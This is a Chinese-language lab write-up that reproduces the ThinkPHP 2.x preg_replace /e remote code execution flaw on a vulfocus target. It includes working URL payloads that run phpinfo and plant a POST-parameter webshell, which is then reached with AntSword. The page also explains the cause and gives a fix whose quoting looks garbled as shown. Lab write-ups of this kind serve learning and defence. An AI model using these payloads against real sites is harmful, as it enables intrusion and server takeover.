首页 > Web开发 > 详细

thinkphp-2x-rce 代码执行

时间:2021-08-20 09:14:05      阅读:65      评论:0      收藏:0      [点我收藏+]

thinkphp-2x-rce 代码执行

漏洞描述

? ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞

影响版本

Thinkphp 2.x的版本

实验环境

攻击机:win10

靶机:vulfocus平台 thinkphp-2x-rce 代码执行

漏洞复现

首先打开靶机 vulfocus平台 thinkphp-2x-rce 代码执行

技术分享图片

根据漏洞的描述 是preg_replace的/e模式匹配路由

$res = preg_replace(‘@(w+)‘.$depr.‘([^‘.$depr.‘/]+)@e‘, ‘$var[‘1‘]="2";‘, implode($depr,$paths));

直接访问

/a/b/c/${@phpinfo()}    打开phpinfo

技术分享图片

构建payload :

/a/b/c/${@print(($_POST[1]))}  // 一句话木马

技术分享图片

打开蚁剑 进行连接 然后就可以直接在tmp文件下找到flag

技术分享图片

原理

首先百度了一下什么是 PHP preg_replace() 函数

preg_replace :函数执行一个正则表达式的搜索和替换。

preg_replace的/e修饰符的解释

修复方案

Dispatcher.class.php文件中的代码

$res = preg_replace(‘@(w+)‘.$depr.‘([^‘.$depr.‘/]+)@e‘, ‘$var[‘1‘]="2";‘, implode($depr,$paths));

修改为

$res = preg_replace(‘@(w+)‘.$depr.‘([^‘.$depr.‘/]+)@e‘, ‘$var[‘1‘]="2‘;‘, implode($depr,$paths));

thinkphp-2x-rce 代码执行

原文:https://www.cnblogs.com/fanwd/p/15164677.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!